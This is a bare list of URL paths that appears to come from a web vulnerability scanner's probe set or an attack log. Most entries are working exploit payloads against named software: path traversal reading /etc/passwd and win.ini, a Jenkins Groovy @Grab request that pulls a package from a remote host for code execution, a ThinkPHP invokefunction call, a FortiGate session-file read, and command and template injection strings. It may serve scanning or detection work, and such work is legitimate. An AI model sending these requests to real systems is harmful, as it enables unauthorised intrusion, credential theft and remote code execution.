/dumpmdm.cmd
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/cgi-bin/login?LD_DEBUG=files
/html/log
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/../../etc/passwd
/filemanager/upload.php
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/blast/nph-viewgif.cgi?../../../../etc/passwd
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/type.php?template={{payload}}
/data/cache_template/rss.tpl.php
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine
?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/wp-content/plugins/wp-payeezy-pay/donate.php
/wp-admin/options-general.php?page=smartcode
/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
/anchor/errors.log
/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1
/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))
/user/scripts/login_par.js
/Admin
/device.rsp?opt=user&cmd=list
/
